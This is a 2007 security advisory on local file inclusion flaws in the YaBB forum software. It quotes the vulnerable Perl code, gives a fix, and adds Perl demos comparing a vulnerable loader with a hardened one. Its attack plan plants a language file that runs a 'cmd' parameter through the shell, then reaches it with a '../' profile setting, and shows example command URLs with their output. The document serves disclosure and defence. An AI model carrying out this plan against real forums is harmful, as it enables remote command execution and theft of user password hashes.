
yabb-lfi.txt

20 Jun 2007 00:00:00, reported by krasza. Type: packetstorm. Source: packetstormsecurity.com

Local File Include Vulnerabilities in YaBB forum software

Local File Include Vulnerabilities
  
Problem: Local File Include Vulnerabilities  
Product: YaBB <= 2.1 (all versions)
Web page: http://www.yabbforum.com/

Credit: Maciej `krasza` Kukla
E-mail: [email protected]
Homepage: www.krasza.int.pl
  
1. Description
  
"YaBB is a leading free forum software package that rivals any professional message board out there. It provides a real-time chat and support system for your visitors. While chat programs allow people to talk directly, you have to be on at the same time as others. With forum software like YaBB, you can talk any time, and everyone can join in the conversation! Build a community and get visitors to come back for interesting discussions, fun chit chat, or needed support without having to spend thousands of dollars."  
  
http://www.google.pl/search?q=Powered+by+YaBB => 1,640,000 results
  
2. Local File Include  
  
I found many bugs of this kind in this board. They all involve one user-controlled variable ($language; you can edit it in your profile). Examples of where I found them:
  
---Sources/HelpCentre.pl:139---  
if (-e ("$helpfile/$language/$help_area/$line.help")) {  
require "$helpfile/$language/$help_area/$line.help";  
}  
---end---  
  
---Sources/Subs.pl:1529---  
if (-e "$langdir/$use_lang/$what_to_load.lng") {  
require "$langdir/$use_lang/$what_to_load.lng";  
}  
---end---  
  
---Sources/ICQPager.pl:21---  
if ($language) { require "$langdir/$language/ICQ.lng"; }  
---end---  
  
---Sources/Post.pl:1838---  
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }  
---end---  
  
---Sources/Post.pl:1863---  
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }  
---end---  
  
---Sources/Post.pl:1880---  
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }  
---end---  
  
---Sources/InstantMessage.pl:1080---  
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/InstantMessage.lng"; }  
---end---  
  
---Sources/InstantMessage.pl:1082---  
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/Main.lng"; }  
---end---  
  
You can set this variable in the profile module. By using "../" sequences in it, you can read other users' files (which hold the password hashes), execute other Perl scripts (and so run your own code), etc.
  
Example attack plan against a page hosting a YaBB forum (executing your command on the server):

1. Find a site running a YaBB forum (for example 'http://victim.com/~krasza/yabb2/').
2. Modify your local copy of the 'English' folder (from the YaBB package):
English/HelpCentre.lng
---
%helptxt = (
'1' => "Help Section",
'2' => "Contents",
---

change to:

---
$content="<br><br><br><br><font color=red>";
$content.=`$INFO{'cmd'}`;      # runs the 'cmd' request parameter through the shell
$content.="</font><br><br><br><br>";
%helptxt = (
'1' => "Help Section",
'2' => $content,
---

3. Copy your modified folder to your account on the target server (victim.com).
4. Create a new user (for example 'attacker') on the target forum ('http://victim.com/~krasza/yabb2/').
5. Edit your profile and set 'userlanguage' to a traversal path such as "../../path/to/your/copy/of/English", so that "$langdir/$use_lang/HelpCentre.lng" resolves to your modified file (I suggest the 'Tamper Data' plugin for Firefox for this).
6. Go to 'Help' on the YaBB page in your browser ('http://victim.com/~krasza/yabb2/YaBB.pl?action=help').
7. Now, thanks to the 'cmd' variable, you can execute your command, for example:

http://victim.com/~krasza/yabb2/YaBB.pl?action=help&cmd=whoami returns 'nobody' (in red) at the top of the left frame.
http://victim.com/~krasza/yabb2/YaBB.pl?action=help&cmd=uname%20-a returns 'Linux thrall 2.4.31 #21 Sun Jun 5 19:19:51 PDT 2005 i686 unknown unknown GNU/Linux'
etc.
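To make the mechanism behind the snippets above and behind step 5 of the plan concrete, here is a small Perl script added for this page (it is not YaBB's code and not the author's exploit). It builds a constructed directory tree in a temp dir, runs a stand-in for the quoted `require "$langdir/$use_lang/$what_to_load.lng"` with a legitimate name and with a traversal name, and then runs a hardened loader next to it. The directory layout, file names, the `load_language_*` functions and the "payload" (which only records that it ran, instead of shelling out to `$INFO{'cmd'}`) are all assumptions made here.

```perl
#!/usr/bin/perl
# Added example, not YaBB code: stand-in for the LoadLanguage-style
#   require "$langdir/$use_lang/$what_to_load.lng"
# quoted in the advisory, run against a constructed tree, plus a hardened loader.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Temp qw(tempdir);

our %helptxt;   # the language files populate %main::helptxt, as HelpCentre.lng does

# Constructed layout (assumption: mirrors $langdir/<language>/<file>.lng):
#   lang/English/HelpCentre.lng   legitimate language file
#   upload/evil/HelpCentre.lng    attacker-controlled file outside $langdir
my $root    = tempdir(CLEANUP => 1);
my $langdir = "$root/lang";
for my $d ("$langdir", "$langdir/English", "$root/upload", "$root/upload/evil") {
    mkdir $d or die "$d: $!";
}
write_file("$langdir/English/HelpCentre.lng",
    q{%main::helptxt = ('1' => 'Help Section', '2' => 'Contents'); 1;});
# The "payload" only records that it executed (the advisory's version runs $INFO{'cmd'}).
write_file("$root/upload/evil/HelpCentre.lng",
    q{%main::helptxt = ('1' => 'Help Section', '2' => "attacker code ran as uid $<"); 1;});

# Vulnerable pattern from the advisory: the user-controlled name is dropped
# straight into the path, so "../" walks out of $langdir and require executes
# whatever file it finds there.
sub load_language_vulnerable {
    my ($use_lang, $what_to_load) = @_;
    my $file = "$langdir/$use_lang/$what_to_load.lng";
    return undef unless -e $file;
    require $file;
    return $file;
}

# Hardened loader (assumed design): allow-list the name, insist it is an
# existing subdirectory of $langdir, then canonicalise and verify the file
# never left $langdir before handing it to require.
sub load_language_hardened {
    my ($use_lang, $what_to_load) = @_;
    die "bad language name\n" unless $use_lang     =~ /\A[0-9A-Za-z_-]+\z/;
    die "bad file name\n"     unless $what_to_load =~ /\A[0-9A-Za-z_]+\z/;
    die "unknown language\n"  unless -d "$langdir/$use_lang";
    my $base = realpath($langdir);
    my $file = realpath("$langdir/$use_lang/$what_to_load.lng");
    die "file missing\n"      unless defined $file && -f $file;
    die "escaped langdir\n"   unless index($file, "$base/") == 0;
    require $file;
    return $file;
}

sub write_file {
    my ($path, $content) = @_;
    open my $fh, '>', $path or die "$path: $!";
    print {$fh} $content, "\n";
    close $fh or die "$path: $!";
}

# 1. Vulnerable loader: legitimate name, then the traversal name from the plan.
for my $lang ('English', '../upload/evil') {
    my $file = load_language_vulnerable($lang, 'HelpCentre');
    printf "vulnerable(%-16s) loaded %s\n    helptxt{2} = %s\n",
        "'$lang'", defined $file ? $file : 'nothing', $helptxt{'2'};
}

# 2. Hardened loader: the traversal name is rejected before any file is touched.
for my $lang ('English', '../upload/evil') {
    my $ok  = eval { load_language_hardened($lang, 'HelpCentre'); 1 };
    my $err = $@; chomp $err;
    printf "hardened  (%-16s) %s\n", "'$lang'", $ok ? 'loaded' : "rejected: $err";
}
```

The second vulnerable call prints the "attacker code ran" text because `-e` and `require` both happily follow the `../` out of the language directory; the hardened loader never gets that far, since the name fails the allow-list. The realpath prefix check is there for the case where a valid-looking name is a symlink pointing outside the directory.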
  
  
3. Exploits:

If you really want to see an exploit for this bug, I can publish my code. I prefer not to publish my exploits; I think the attack plan above should suffice.
  
  
4. Fix:

YaBB must filter the language variable in the profile module. Until YaBB publishes an official fix, you should edit Sources/Profile.pl as follows:
  
---Sources/Profile.pl:1225---  
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@/]+\Z^ && $member{'userlanguage'} ne "") { &fatal_error($profile_txt{'815'}); }  
---end---  
  
change for:  
  
---Sources/Profile.pl:1225---  
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@]+\Z^ && $member{'userlanguage'} ne "") { &fatal_error($profile_txt{'815'}); }  
---end---  
  
This version rejects any slash '/' in the value, so a "../" traversal out of the language directory is no longer possible. Note that the character class still accepts '.', so a value of ".." (one level up, with no slash) passes, and \Z, unlike \z, tolerates a trailing newline. A tighter check would allow only letters, digits, '_' and '-' and verify that the value names an existing subdirectory of the language folder.
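The following Perl script, added for this page (not part of the advisory or of YaBB), runs the Profile.pl condition with the character class exactly as quoted above, once with and once without the '/', over a few constructed 'userlanguage' values, and puts a stricter allow-list next to them for comparison. The `$strict` pattern and the sample values are assumptions made here.

```perl
#!/usr/bin/perl
# Added example, not YaBB code: the Profile.pl check before and after the
# advisory's fix, over constructed 'userlanguage' values.
use strict;
use warnings;

# Same character class as Sources/Profile.pl:1225; the only difference
# between the two is the trailing '/' in the first.
my $before = qr/\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@\/]+\Z/;
my $after  = qr/\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@]+\Z/;
# Assumed stricter alternative: letters, digits, '_' and '-' only, anchored
# with \z so that a trailing newline (which \Z tolerates) is rejected too.
my $strict = qr/\A[0-9A-Za-z_-]+\z/;

# Mirrors the Profile.pl condition: a non-empty value that fails the match
# goes to fatal_error; an empty value is let through.
sub rejected_by {
    my ($re, $value) = @_;
    return ($value ne '' && $value !~ $re) ? 'reject' : 'accept';
}

# Constructed inputs.
my @samples = (
    'English',                      # legitimate language name
    '../../home/attacker/English',  # traversal as in the attack plan
    '..',                           # one level up without any slash
    "English\n",                    # trailing newline, tolerated by \Z
    '%2e%2e%2fEnglish',             # encoded traversal: require does not decode it,
                                    # but the class accepts it all the same
    '',                             # empty value, explicitly allowed by Profile.pl
);

printf "%-32s %-8s %-8s %-8s\n", 'userlanguage', 'before', 'after', 'strict';
for my $v (@samples) {
    (my $shown = $v) =~ s/\n/\\n/g;
    printf "%-32s %-8s %-8s %-8s\n", "'$shown'",
        map { rejected_by($_, $v) } $before, $after, $strict;
}
```

The table shows the fix doing exactly what the advisory says, rejecting the slash-bearing traversal, while '..', the trailing-newline variant and the percent-encoded string are still accepted by both YaBB patterns and rejected only by the stricter one.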
  
  
  
Maciej `krasza` Kukla  
[email protected]  
www.krasza.int.pl  
  
http://www.krewniacy.pl  
  
--   
Best regards, Maciej `krasza` Kukla   
